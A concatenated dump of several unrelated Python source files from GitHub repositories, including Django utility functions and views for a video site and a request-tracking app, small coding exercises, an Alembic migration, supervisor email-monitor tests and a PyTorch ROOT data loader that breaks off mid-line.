u'є':'ye', u'і':'i', u'ї':'yi', u'ґ':'g'\n}\nCZECH_MAP = {\n u'č':'c', u'ď':'d', u'ě':'e', u'ň':'n', u'ř':'r', u'š':'s', u'ť':'t', u'ů':'u',\n u'ž':'z', u'Č':'C', u'Ď':'D', u'Ě':'E', u'Ň':'N', u'Ř':'R', u'Š':'S', u'Ť':'T',\n u'Ů':'U', u'Ž':'Z'\n}\n\nPOLISH_MAP = {\n u'ą':'a', u'ć':'c', u'ę':'e', u'ł':'l', u'ń':'n', u'ó':'o', u'ś':'s', u'ź':'z',\n u'ż':'z', u'Ą':'A', u'Ć':'C', u'Ę':'e', u'Ł':'L', u'Ń':'N', u'Ó':'o', u'Ś':'S',\n u'Ź':'Z', u'Ż':'Z'\n}\n\nLATVIAN_MAP = {\n u'ā':'a', u'č':'c', u'ē':'e', u'ģ':'g', u'ī':'i', u'ķ':'k', u'ļ':'l', u'ņ':'n',\n u'š':'s', u'ū':'u', u'ž':'z', u'Ā':'A', u'Č':'C', u'Ē':'E', u'Ģ':'G', u'Ī':'i',\n u'Ķ':'k', u'Ļ':'L', u'Ņ':'N', u'Š':'S', u'Ū':'u', u'Ž':'Z'\n}\n\ndef _makeRegex():\n ALL_DOWNCODE_MAPS = {}\n ALL_DOWNCODE_MAPS.update(LATIN_MAP)\n ALL_DOWNCODE_MAPS.update(LATIN_SYMBOLS_MAP)\n ALL_DOWNCODE_MAPS.update(GREEK_MAP)\n ALL_DOWNCODE_MAPS.update(TURKISH_MAP)\n ALL_DOWNCODE_MAPS.update(RUSSIAN_MAP)\n ALL_DOWNCODE_MAPS.update(UKRAINIAN_MAP)\n ALL_DOWNCODE_MAPS.update(CZECH_MAP)\n ALL_DOWNCODE_MAPS.update(POLISH_MAP)\n ALL_DOWNCODE_MAPS.update(LATVIAN_MAP)\n \n s = u\"\".join(ALL_DOWNCODE_MAPS.keys())\n regex = re.compile(u\"[%s]|[^%s]+\" % (s,s))\n \n return ALL_DOWNCODE_MAPS, regex\n\n_MAPINGS = None\n_regex = None\ndef downcode(s):\n \"\"\"\n This function is 'downcode' the string pass in the parameter s. This is useful \n in cases we want the closest representation, of a multilingual string, in simple\n latin chars. The most probable use is before calling slugify.\n \"\"\"\n global _MAPINGS, _regex\n\n if not _regex:\n _MAPINGS, _regex = _makeRegex() \n\n downcoded = \"\"\n for piece in _regex.findall(s):\n if _MAPINGS.has_key(piece):\n downcoded += _MAPINGS[piece]\n else:\n downcoded += piece\n return downcoded\n\n\ndef slugify_unique(value, model, slugfield=\"slug\"):\n suffix = 0\n potential = base = slugify(downcode(value))\n while True:\n if suffix:\n potential = \"-\".join([base, str(suffix)])\n if not model.objects.filter(**{slugfield: potential}).count():\n return potential\n suffix += 1\n\n\"\"\"\nslugify_unique - end\n\"\"\"\n\n\ndef clean_text_for_search(text):\n \"\"\"\n Prepare text for indexing and search.\n \"\"\"\n # Get the normalized unicode text.\n text= force_unicode(text).strip()\n\n # Remove e-mail quotation from the beginnings of the string.\n text= re.sub(r'^\\>+', '', text)\n\n # Remove e-mail addresses.\n text= re.sub(r'\\b[A-Za-z0-9_\\.-]+@[A-Za-z0-9_\\.-]+[A-Za-z0-9_][A-Za-z0-9_]\\b', '', text)\n\n # Try to convert html to text.\n try:\n text= html2text(text)\n except:\n pass\n\n # Clean the text from special characters, such as\n # section divisions ***, etc. but preserve punctuation.\n text= re.sub(r'\\B\\W{2,}\\B', ' ', text)\n\n # Remove all returns and new lines.\n text= re.sub(r'\\n+', ' ', text)\n text= re.sub(r'\\r+', ' ', text)\n\n # Convert multiple spaces to singles.\n text= re.sub(r'\\s{2,}', ' ', text)\n\n return text\n\n\ndef get_domain_name(id=1):\n \"\"\"\n Get the project's domain name by its ID.\n Default is the 1st project.\n \"\"\"\n try:\n return Site.objects.get(id=id).domain\n except Site.DoesNotExist: # Return the default one.\n return Site.objects.get(id=1).domain\n\n\ndef increment_id(model, field):\n \"\"\"\n Get the maximum of `field`, return its value increment to 1.\n \"\"\"\n try:\n return model.objects.values(field).distinct()\\\n .order_by('-'+field)[0][field] + 1\n except IndexError: # No records yet\n return 1\n except TypeError: # Non-integer/float field cannot be incremented.\n return None\n\n\ndef re_subject(line):\n \"\"\"\n Constructing a subject in a manner 'Re[N]: subject line' or \n 'Re(N): subject line', based on the given line.\n\n If there's already such a pattern, increment N, otherwise simply add\n 'Re: ' to the beginning.\n \"\"\"\n caseRe= re.match(r'(?P<num>Re\\:)', line)\n caseReN= re.match(r'Re(\\[|\\()(?P<num>\\d+)(\\]|\\))', line)\n try:\n return line.replace(caseReN.group('num'),\n str(int(caseReN.group('num'))+1))\n except:\n try:\n return line.replace(caseRe.group('num'), 'Re[1]:')\n except:\n pass\n return 'Re: ' + line\n\n\ndef process_filter_request(request, statuses):\n \"\"\"\n Process GET with parameters:\n - extract params for initial dict\n - prepare kwargs for db query\n - define urlparams string.\n \"\"\"\n # \"Constants\".\n filtered_status= {'all': [k[0] for k in statuses],\n 'successful': ['successful', 'part_successful'],\n 'unsuccessful': ['refused', 'no_info'],\n 'unresolved': ['in_progress', 'overdue', 'long_overdue', 'withdrawn', 'awaiting']}\n\n # Define kwargs for filtering.\n query, initial= dict(), dict()\n \n # Define keywords.\n initial.update({'keywords': request.GET.get('keywords', '')})\n if initial['keywords'] != '':\n query.update({'summary__iregex': initial['keywords'].replace(' ', '|')})\n \n # Define status. Warning: status is in the param name, not value!\n status= 'all'\n for param in dict(request.GET).keys():\n if param in filtered_status.keys():\n status= param\n break\n query.update({'status__in': filtered_status[status]})\n\n # URL params\n urlparams= {'status': status, 'params': \\\n '?'+'&'.join(['='.join([k, v[0]]) for k, v in dict(request.GET).iteritems()])}\n \n # Define `date_after` and `date_before`.\n initial['date_after']= request.GET.get('date_after', '')\n initial['date_before']= request.GET.get('date_before', '')\n if initial['date_after'] != '':\n query.update({'created__gte': strftime('%Y-%m-%d',\n strptime(initial['date_after'], '%d-%m-%Y'))})\n if initial['date_before'] != '':\n query.update({'created__lte': strftime('%Y-%m-%d 23:59:59',\n strptime(initial['date_before'], '%d-%m-%Y'))})\n return initial, query, urlparams\n\n\ndef id_generator(size=6, chars=string.ascii_lowercase+string.digits):\n \"\"\"\n Generate unique filename to store in FS.\n \"\"\"\n return ''.join(random.choice(chars) for x in range(size))\n\n\ndef handle_image(f, store_path, **kwargs):\n \"\"\"\n Upload file, create a thumbnail from it, name it randomly,\n save to site_media, return it's name.\n \"\"\"\n filename_len= kwargs.get('filename_len', 16)\n thumbnail_size= kwargs.get('thumbnail_size', (70, 70))\n ext= f.name.split('.')[-1]\n ext= '.'+ext if ext != f.name else '' # no extension\n filename= id_generator(filename_len)\n path= store_path + filename + ext\n with open(path, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n im= Image.open(path) # Create thumbnail\n if im.mode != \"RGB\":\n im = im.convert(\"RGB\")\n im.thumbnail(thumbnail_size, Image.ANTIALIAS)\n im.save(path, \"JPEG\")\n return filename + ext\n\n\ndef save_attached_file(f, store_root, **kwargs):\n \"\"\"\n Check if attachments are ok, save files,\n return what is needed to save attachment in the db.\n \"\"\"\n max_size= kwargs.get('max_size', 104857600) # Default limit is 100MB\n dir_name= kwargs.get('dir_name', id_generator()) # Random name, if not given\n dir_id= kwargs.get('dir_id', None)\n if dir_id is None: # Now, if not given\n dir_id= datetime.strftime(datetime.utcnow().replace(\n tzinfo=utc), '%d-%m-%Y_%H-%M')\n\n f_info= {'size': len(f), 'path': None, 'errors': []} # Object to return\n if f_info['size'] > max_size:\n f_info['errors'].append(AppMessage('AttachTooBig').message %\n {'filename': f.name,\n 'maxsize': filesizeformat(max_size)})\n\n # TO-DO: 'Sniff' the file before saving\n\n if len(f_info['errors']) == 0:\n\n # Ensure all directory names.\n dir_full= ('%s/attachments/%s/%s' % (\n store_root, dir_name, dir_id)).replace('//', '/')\n path_report= ('%s/%s/%s' % (\n dir_name, dir_id, f.name)).replace('//', '/')\n path_full= ('%s/%s' % (dir_full, f.name)).replace('//', '/')\n\n # Ensure directory on disk.\n if not os.path.exists(dir_full):\n os.makedirs(dir_full)\n\n try:\n path= default_storage.save(path_full, ContentFile(f.read()))\n f_info['path']= path_report # Returns relative (to MEDIA_ROOT) path.\n except Exception as e:\n err= AppMessage('CantSaveAttachmnt').message % {\n 'filename': filename, 'error': e}\n print >> sys.stderr, '[%s] %s' % (datetime.now().isoformat(), err)\n f_info['errors'].append(err)\n return f_info\n\n\ndef email_from_name(name, **kwargs):\n \"\"\"\n Build e-mail address from given name.\n \"\"\"\n id= kwargs.get('id', None)\n delimiter=kwargs.get('delimiter', None)\n domain= kwargs.get('domain', get_domain_name())\n name= slugify(downcode(name))\n if id:\n template= '%s-%s@%s' % (name, id, domain)\n else:\n template= '%s@%s' % (name, domain)\n if delimiter:\n template= template.replace('-', delimiter)\n return template\n\n\ndef login(request, **kwargs):\n \"\"\"\n Custom view - handling the login form with \"Remember me\" checkbox.\n \"\"\"\n template_name= kwargs.get('template_name', 'registration/login.html')\n response= auth_views.login(request, template_name)\n if request.POST.has_key('remember_me'):\n request.session.set_expiry(settings.SESSION_EXPIRE_AFTER)\n return response\n\n\ndef update_user_message(msg, notification, kind):\n \"\"\"\n Updates session messages. The structure of the dict is:\n {\n 'success': [<notifications>],\n 'warning': [<notifications>],\n 'warning_yesno': [<notifications>],\n 'fail': [<errors>]\n }\n Anything else is considered as 'info'.\n \"\"\"\n kinds= ('success', 'warning', 'warning_yesno', 'fail',)\n if kind not in kinds:\n kind= 'info'\n notifications= msg.pop(kind, [])\n if notifications is None:\n notifications= []\n if isinstance(notification, basestring):\n try:\n notifications.append(notification)\n except:\n pass\n elif isinstance(notification, list):\n try:\n notifications.extend(notification)\n except:\n pass\n else: # Ignore anything else.\n pass\n msg.update({kind: notifications})\n return msg\n\ndef send_mail_managers(subject, message, fail_silently=False,\n connection=None, headers=None):\n \"\"\"\n Sends a message to the managers, as defined by the MANAGERS setting.\n \"\"\"\n if not settings.MANAGERS:\n return\n mail= EmailMessage(subject, message, settings.SERVER_EMAIL,\n [a[1] for a in settings.MANAGERS], headers=headers)\n mail.send(fail_silently=fail_silently)\n\ndef send_notification(notification):\n \"\"\"\n Sending user a notification about the event\n as described in EventNotification.\n\n Returns True if message successfully sent.\n \"\"\"\n template= 'emails/notification_%s.txt' % notification.action\n subj_name= None\n for attr in ['name', 'summary', 'subject']:\n try:\n subj_name= getattr(notification.item.content_object, attr)\n except:\n pass\n else:\n break\n message_subject= '%s: %s' % (notification.get_action_display(), subj_name)\n message_subject= force_unicode(message_subject)\n message_content= render_to_string(template, {'notification': notification,\n 'domain': get_domain_name()})\n message_notification= EmailMessage(message_subject, message_content,\n settings.SERVER_EMAIL, [notification.receiver_email])\n try: # sending the message to the receiver, check if it doesn't fail.\n message_notification.send(fail_silently=False)\n except Exception as e:\n print >> sys.stderr, '[%s] %s' % (datetime.now().isoformat(),\n AppMessage('MailSendFailed').message % e)\n return False\n return True\n\ndef render_to_pdf(template_src, context_dict, **kwargs):\n \"\"\"\n Renders html template to PDF.\n Returns a response of MIME type 'application/pdf'\n \"\"\"\n context_instanse= kwargs.get('context', None)\n context_dict.update({'download': True})\n result= StringIO.StringIO()\n try:\n html= render_to_string(template_src, context_dict, context_instanse)\n pdf= pisa.pisaDocument(StringIO.StringIO(html.encode(\"UTF-8\")), result,\n encoding=\"utf8\")\n except xhtml2pdf.w3c.cssParser.CSSParseError:\n html= render_to_string(template_src, context_dict, None)\n pdf= pisa.pisaDocument(StringIO.StringIO(html.encode(\"UTF-8\")), result,\n encoding=\"utf8\")\n return pdf, result\n","repo_name":"CCLab/sezam","sub_path":"apps/backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8011531046","text":"def angles(a, b, c):\n gipo = 0\n if a > c:\n gipo = a\n elif b > c:\n gipo = b\n else:\n gipo = c\n if a > b:\n gipo = a\n if gipo >= a + b + c - gipo:\n return [0, 0, 0]\n\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert angles(4, 4, 4) == [60, 60, 60], \"All sides are equal\"\n assert angles(3, 4, 5) == [37, 53, 90], \"Egyptian triangle\"\n assert angles(2, 2, 5) == [0, 0, 0], \"It can not be a triangle\"\n\n print(\"Code's finished? Earn rewards by clicking 'Check' to review your tests!\")\n","repo_name":"palandrp/empireofcode","sub_path":"triangle_angels.py","file_name":"triangle_angels.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2192200337","text":"import osmnx as ox\nimport numpy as np\nimport pandas as pd\n\nfrom src.final_functions import getAnytimeAlgorithmData, variablesToUseFix\n\nnp.random.seed(0)\n\nG = ox.load_graphml('./data/graph-BH-1km-7-7-22-0130.graphml')\nvariablesToUse = ['noWay', 'isClosed', 'maxSpeed', 'speed']\nvariablesToUseFix(variablesToUse)\n\nallNodes = []\nat_values = []\nsolvableCount = 0\n\nusedNodes = []\n\nwhile solvableCount < 100:\n currentNodes = []\n \n # random nodes maker\n while(len(currentNodes) < 3):\n randomNode = int(np.random.choice(G.nodes))\n if(randomNode not in currentNodes):\n currentNodes.append(randomNode)\n \n if((len(currentNodes) == 3) and (currentNodes in allNodes)):\n currentNodes = []\n elif (len(currentNodes) == 3):\n allNodes.append(currentNodes)\n \n try:\n \n shortest_path_anytime, desired_path_anytime, explanations_anytime, optimalValues_anytime = getAnytimeAlgorithmData(currentNodes, variablesToUse)\n at_values.append(optimalValues_anytime)\n usedNodes.append(currentNodes)\n \n newData = pd.DataFrame({\n 'nodes': usedNodes,\n 'anytime_algorithm_values': at_values,\n })\n\n\n newData.to_csv('./data/anytime_algorithm_problems.csv', index=False)\n \n if optimalValues_anytime[len(optimalValues_anytime) -1] != None:\n solvableCount += 1\n \n except:\n pass\n\n print(solvableCount)\n\n \nnewData = pd.DataFrame({\n 'nodes': usedNodes,\n 'anytime_algorithm_values': at_values,\n })\n\n\nnewData.to_csv('./data/anytime_algorithm_problems.csv', index=False)","repo_name":"khalid-alsheeb/explainable-road-navigation","sub_path":"website/backend/src/experiments/old/hundredAT.py","file_name":"hundredAT.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37232280121","text":"class Rectangle:\n # member variables\n #height = 0\n #width = 0\n # constructor\n def __init__(self, height, width):\n self.height = height\n self.width = width\n # calculate area\n def area(self):\n a = self.height * self.width\n return a\n # return self.height * self.width - another way\n # calculate perimeter\n def perimeter(self):\n p = (2 * self.height) + (2 * self.width)\n return p\n\n# create instance\nr1 = Rectangle(10,35)\nr1.height = 20\n\nr2 = Rectangle(2,5)\n\nprint(\"The area of the rectangle is \", r1.area())\nprint(\"The area of the 2nd rectangle is \", r2.area())\nprint(\"The perimeter of the 2nd rectangle is \", r2.perimeter())\n\nprint(f\"Area of r1 = {r1.height} x {r1.width} = {r1.area()}\")\nprint(f\"Area of r2 = {r2.height} x {r2.width} = {r2.area()}\")","repo_name":"eimarmichellex98/gtLabs","sub_path":"rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73510419306","text":"\"\"\"empty message\n\nRevision ID: d5e747d48a42\nRevises: 72b8d6801b2f\nCreate Date: 2019-10-08 18:31:33.072892\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd5e747d48a42'\ndown_revision = '72b8d6801b2f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('mission', sa.Column('mission_level', sa.Integer(), nullable=True))\n op.add_column('mission', sa.Column('prize', sa.Float(), nullable=True))\n op.drop_constraint('mission_user_id_fkey', 'mission', type_='foreignkey')\n op.drop_column('mission', 'user_id')\n op.add_column('user_basic', sa.Column('mission_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'user_basic', 'mission', ['mission_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'user_basic', type_='foreignkey')\n op.drop_column('user_basic', 'mission_id')\n op.add_column('mission', sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.create_foreign_key('mission_user_id_fkey', 'mission', 'user_basic', ['user_id'], ['id'])\n op.drop_column('mission', 'prize')\n op.drop_column('mission', 'mission_level')\n # ### end Alembic commands ###\n","repo_name":"tewei/ninetydays","sub_path":"migrations/versions/d5e747d48a42_.py","file_name":"d5e747d48a42_.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74505919466","text":"# https://www.codewars.com/kata/585fc200db20cf20ab00018a\n# 2023-05-23T13:45:04.010+0000\nimport numpy as np\n\ndef max_sum(arr):\n arr = np.array(arr)\n max_sum = -1\n max_subarray = []\n rows, cols = arr.shape\n \n for start_row in range(rows):\n row_sums = np.zeros(cols)\n \n for end_row in range(start_row, rows):\n row_sums += arr[end_row]\n \n # Apply Kadane's algorithm to find the maximum sum subarray in the 1D array\n current_sum = 0\n max_sum_so_far = 0\n start_col = 0\n end_col = 0\n \n for j, num in enumerate(row_sums):\n current_sum += num\n \n if current_sum < 0:\n current_sum = 0\n start_col = j + 1\n elif current_sum > max_sum_so_far:\n max_sum_so_far = current_sum\n end_col = j\n \n # Check if the current subarray has the maximum sum\n if max_sum_so_far > max_sum:\n max_sum = max_sum_so_far\n max_subarray = [start_col, start_row, end_col, end_row]\n \n return max_subarray + [max_sum]\n","repo_name":"Eatkin/codewars-solutions","sub_path":"Python/Maximum_2d_subarray_sum-Beta.py","file_name":"Maximum_2d_subarray_sum-Beta.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29716791341","text":"import unittest\nimport mock\nimport time\nfrom StringIO import StringIO\n\nclass ProcessStateEmailMonitorTestException(Exception):\n pass\n\nclass ProcessStateEmailMonitorTests(unittest.TestCase):\n from_email = 'testFrom@blah.com'\n to_emails = ('testTo@blah.com', 'testTo2@blah.com')\n to_str = 'testTo@blah.com, testTo2@blah.com'\n subject = 'Test Alert'\n \n def _get_target_class(self):\n from superlance.process_state_email_monitor \\\n import ProcessStateEmailMonitor\n return ProcessStateEmailMonitor\n \n def _make_one(self, **kwargs):\n kwargs['stdin'] = StringIO()\n kwargs['stdout'] = StringIO()\n kwargs['stderr'] = StringIO()\n kwargs['from_email'] = kwargs.get('from_email', self.from_email)\n kwargs['to_emails'] = kwargs.get('to_emails', self.to_emails)\n kwargs['subject'] = kwargs.get('subject', self.subject)\n \n obj = self._get_target_class()(**kwargs)\n return obj\n \n def _make_one_mock_send_email(self, **kwargs):\n obj = self._make_one(**kwargs)\n obj.send_email = mock.Mock()\n return obj\n\n def _make_one_mock_send_smtp(self, **kwargs):\n obj = self._make_one(**kwargs)\n obj.send_smtp = mock.Mock()\n return obj\n \n def test_validate_cmd_line_options_single_to_email_ok(self):\n klass = self._get_target_class()\n \n options = mock.Mock()\n options.from_email = 'blah'\n options.to_emails = 'frog'\n \n validated = klass.validate_cmd_line_options(options)\n self.assertEquals(['frog'], validated.to_emails)\n\n def test_validate_cmd_line_options_multi_to_emails_ok(self):\n klass = self._get_target_class()\n \n options = mock.Mock()\n options.from_email = 'blah'\n options.to_emails = 'frog, log,dog'\n \n validated = klass.validate_cmd_line_options(options)\n self.assertEquals(['frog', 'log', 'dog'], validated.to_emails)\n \n def test_send_email_ok(self):\n email = {\n 'body': 'msg1\\nmsg2',\n 'to': self.to_emails,\n 'from': 'testFrom@blah.com',\n 'subject': 'Test Alert',\n }\n monitor = self._make_one_mock_send_smtp()\n monitor.send_email(email)\n \n #Test that email was sent\n self.assertEquals(1, monitor.send_smtp.call_count)\n smtpCallArgs = monitor.send_smtp.call_args[0]\n mimeMsg = smtpCallArgs[0]\n self.assertEquals(self.to_str, mimeMsg['To'])\n self.assertEquals(email['from'], mimeMsg['From'])\n self.assertEquals(email['subject'], mimeMsg['Subject'])\n self.assertEquals(email['body'], mimeMsg.get_payload())\n\n def _raiseSTMPException(self, mime, to_emails):\n raise ProcessStateEmailMonitorTestException('test')\n \n def test_send_email_exception(self):\n email = {\n 'body': 'msg1\\nmsg2',\n 'to': self.to_emails,\n 'from': 'testFrom@blah.com',\n 'subject': 'Test Alert',\n }\n monitor = self._make_one_mock_send_smtp()\n monitor.send_smtp.side_effect = self._raiseSTMPException\n monitor.send_email(email)\n\n #Test that error was logged to stderr\n self.assertEquals(\"Error sending email: test\\n\", monitor.stderr.getvalue())\n \n def test_send_batch_notification(self):\n test_msgs = ['msg1', 'msg2']\n monitor = self._make_one_mock_send_email()\n monitor.batchmsgs = test_msgs\n monitor.send_batch_notification()\n \n #Test that email was sent\n expected = {\n 'body': 'msg1\\nmsg2',\n 'to': self.to_emails,\n 'from': 'testFrom@blah.com',\n 'subject': 'Test Alert',\n }\n self.assertEquals(1, monitor.send_email.call_count)\n monitor.send_email.assert_called_with(expected)\n \n #Test that email was logged\n self.assertEquals(\"\"\"Sending notification email:\nTo: %s\nFrom: testFrom@blah.com\nSubject: Test Alert\nBody:\nmsg1\nmsg2\n\"\"\" % (self.to_str), monitor.stderr.getvalue())\n \n def test_log_email_with_body_digest(self):\n bodyLen = 80\n monitor = self._make_one_mock_send_email()\n email = {\n 'to': ['you@fubar.com'],\n 'from': 'me@fubar.com',\n 'subject': 'yo yo',\n 'body': 'a' * bodyLen,\n }\n monitor.log_email(email)\n self.assertEquals(\"\"\"Sending notification email:\nTo: you@fubar.com\nFrom: me@fubar.com\nSubject: yo yo\nBody:\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...\n\"\"\", monitor.stderr.getvalue())\n self.assertEquals('a' * bodyLen, email['body'])\n\n def test_log_email_without_body_digest(self):\n monitor = self._make_one_mock_send_email()\n email = {\n 'to': ['you@fubar.com'],\n 'from': 'me@fubar.com',\n 'subject': 'yo yo',\n 'body': 'a' * 20,\n }\n monitor.log_email(email)\n self.assertEquals(\"\"\"Sending notification email:\nTo: you@fubar.com\nFrom: me@fubar.com\nSubject: yo yo\nBody:\naaaaaaaaaaaaaaaaaaaa\n\"\"\", monitor.stderr.getvalue())\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"XiaoMi/minos","sub_path":"supervisor/superlance/tests/process_state_email_monitor_test.py","file_name":"process_state_email_monitor_test.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":520,"dataset":"github-code","pt":"37"} +{"seq_id":"22322387535","text":"from django.shortcuts import render_to_response\nfrom videos.models import Stream, Video, Association, Module, UserProfile\nfrom django.http import Http404\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\n\n#send info about request object to template so it can use csrf token\nfrom django.template import RequestContext\n\ndef index(request):\n\tstreams_list=Stream.objects.all()\n\tuser=request.user\n\treturn render_to_response('videos/index.html',locals())\n\t\ndef detail(request,video_url_friendly):\n\ttry:\n\t\tvideo=False\n\t\tvideos=Video.objects.all()\n\t\tfor v in videos:\n\t\t\tif (v.url_friendly()==video_url_friendly):\n\t\t\t\tvideo=v\n\t\t\t\tbreak\n\t\t\t\t\n\t\tif (not video):\n\t\t\traise Http404\n\texcept Video.DoesNotExist:\n\t\traise Http404\n\t\n\t#marking\n\tvideos_completed=[]\n\tvideo_completed=False\n\tprofile=None\n\tif request.user.is_authenticated():\n\t\tprofile=request.user.userprofile_set.all()[0]\n\t\tvideos_completed=profile.completed_videos.all()\n\t\tif (video in videos_completed):\n\t\t\tvideo_completed=True\n\t\n\t\n\tback=video.module_id.association_set.all()[0].association_stream_id.url_friendly()\n\t\n\tnext_video=False\n\t\n\tif (video.module_id.video_count>video.video_part):\n\t\ttry:\n\t\t\tnext_video=Video.objects.get(module_id=video.module_id,video_part=(video.video_part)+1).url_friendly()\n\t\texcept Video.DoesNotExist:\n\t\t\tpass\n\tif not next_video:\n\t\tstream_module=video.next_video_in_stream()\n\t\tif (stream_module):\n\t\t\ttry: #added temporarily (there seems to be an issue with linked-list 2 only)\n\t\t\t\tnext_association=Association.objects.filter(association_stream_id=stream_module[0],association_part=stream_module[1])[0]\n\t\t\t\tnext_video=next_association.association_module_id.video_set.all()[0].url_friendly()\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\t\t\n\tif (video.video_part>1):\n\t\ttry:\n\t\t\tprevious_video=Video.objects.get(module_id=video.module_id, video_part=(video.video_part)-1).url_friendly()\n\t\texcept Video.DoesNotExist:\t\n\t\t\tpass\n\n\treturn render_to_response('videos/detail.html',locals(), context_instance=RequestContext(request))\n\ndef search(request):\n\tfrom helpers import get_query\n\t\n\tquery_string = ''\n\tfound_entries = None\n\tif ('q' in request.GET) and request.GET['q'].strip():\n\t\tquery_string = request.GET['q']\n\t\tentry_query = get_query(query_string, ['module_title', 'module_description',])\n\t\tfound_entries = Module.objects.filter(entry_query)\n\t\n\treturn render_to_response('videos/search_results.html', { 'query_string': query_string, 'found_entries': found_entries }, context_instance=RequestContext(request))\n\ndef top(request):\n\tentries=[]\n\t\n\tfor module in Module.objects.all():\n\t\tif (module.module_rating):\n\t\t\tscore=float(module.module_rating)*int(module.module_raters)\n\t\t\t#score=float(module.module_rating)*int(module.module_raters)\n\t\t\tentries.append((module,score))\n\t\n\tif (entries):\n\t\tfrom operator import itemgetter\n\t\tentries=sorted(entries,key=itemgetter(1), reverse=True)\n\t\t\n\tmodules=[]\t\n\tfor module_tuple in entries:\n\t\tmodules.append(module_tuple[0])\n\t\n\tmodules=modules[:10]\n\t\n\treturn render_to_response('videos/top.html', { 'modules': modules }, context_instance=RequestContext(request))\n\t\ndef popular(request):\n\tentries=[]\n\t\n\tfor module in Module.objects.all():\n\t\tif (module.module_views):\n\t\t\tviews=int(module.module_views)\n\t\t\tentries.append((module,views))\n\t\n\tif (entries):\n\t\tfrom operator import itemgetter\n\t\tentries=sorted(entries,key=itemgetter(1), reverse=True)\n\t\t\n\tmodules=[]\t\n\tfor module_tuple in entries:\n\t\tmodules.append(module_tuple[0])\n\t\n\tmodules=modules[:10]\n\t\n\treturn render_to_response('videos/popular.html', { 'modules': modules }, context_instance=RequestContext(request))\n\ndef new(request):\n\tentries=[]\n\t\n\tfor module in Module.objects.all():\n\t\tpublished=module.module_published\n\t\tentries.append((module,published))\n\t\n\tif (entries):\n\t\tfrom operator import itemgetter\n\t\tentries=sorted(entries,key=itemgetter(1), reverse=True)\n\t\t\n\tmodules=[]\t\n\tfor module_tuple in entries:\n\t\tmodules.append(module_tuple[0])\n\t\n\tmodules=modules[:10]\n\t\n\treturn render_to_response('videos/new.html', { 'modules': modules }, context_instance=RequestContext(request))\n\ndef random(request):\n\tfrom django.http import HttpResponseRedirect\n\tvideo=Video.objects.filter(video_part=1).order_by('?')[0]\n\turl=\"/videos/\"+video.url_friendly()\n\treturn HttpResponseRedirect(url)\n\t\n@login_required\ndef mark(request,video_pk=None):\n\tif request.user.is_authenticated():\n\t\tprofile=request.user.userprofile_set.all()[0]\n\t\taction_type=\"\"\n\t\tpk_to_mark=\"\"\n\t\turl=\"\"\n\t\t\n\t\tif (not video_pk is None and video_pk!=''):\n\t\t\turl=Video.objects.get(pk=int(video_pk)).url_friendly()+\"#interact_anchor\"\n\t\t\n\t\t#mac mai\n\t\tif ('action_type' in request.POST) and request.POST['action_type'].strip():\n\t\t\taction_type = request.POST['action_type']\n\n\t\tif ('video' in request.POST) and request.POST['video'].strip():\n\t\t\tpk_to_mark = request.POST['video']\n\t\t\n\t\tif (action_type!=\"\" and pk_to_mark!=\"\"):\n\t\t\tvideo=Video.objects.get(pk=int(pk_to_mark))\n\t\t\turl=video.url_friendly()\n\t\t\tif (action_type==\"mac\"):\n\t\t\t\tprofile.completed_videos.add(video)\n\t\t\tif (action_type==\"mai\"):\n\t\t\t\tprofile.completed_videos.remove(video)\n\t\treturn HttpResponseRedirect(\"/videos/\"+url)\n\t\n\telse:\n\t# Do something for anonymous users.\n\t\tpass\n","repo_name":"AkeelAli/HackerCS_Server","sub_path":"videos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17236816043","text":"import os\nimport csv\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom ROOT import TFile, TTree, TBranch, TCanvas, TPad, gStyle, gFile, gROOT, TStyle, TH1D, TH2D, gDirectory, TProfile, TColor, TGraph, TLegend, THStack, TLatex\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\n\nsys.path.append('/home/matthew/Documents/Masters/Met_network/Networks')\nimport Network as mn\n\n######## The data set class must be defined for PyTorch to be able to read the data ########\nclass RootDataSet(Dataset):\n def __init__( self, root_folder, data_set_name, n_events = None, real = False ):\n \n self.my_file_name = os.path.join( root_folder, data_set_name )\n self.my_file = TFile.Open(self.my_file_name)\n \n self.my_tree = self.my_file.Get(\"var_tree\")\n self.n_events = n_events if n_events is not None else self.my_tree.GetEntries()\n\n self.branch_names = [ b.GetName() for b in 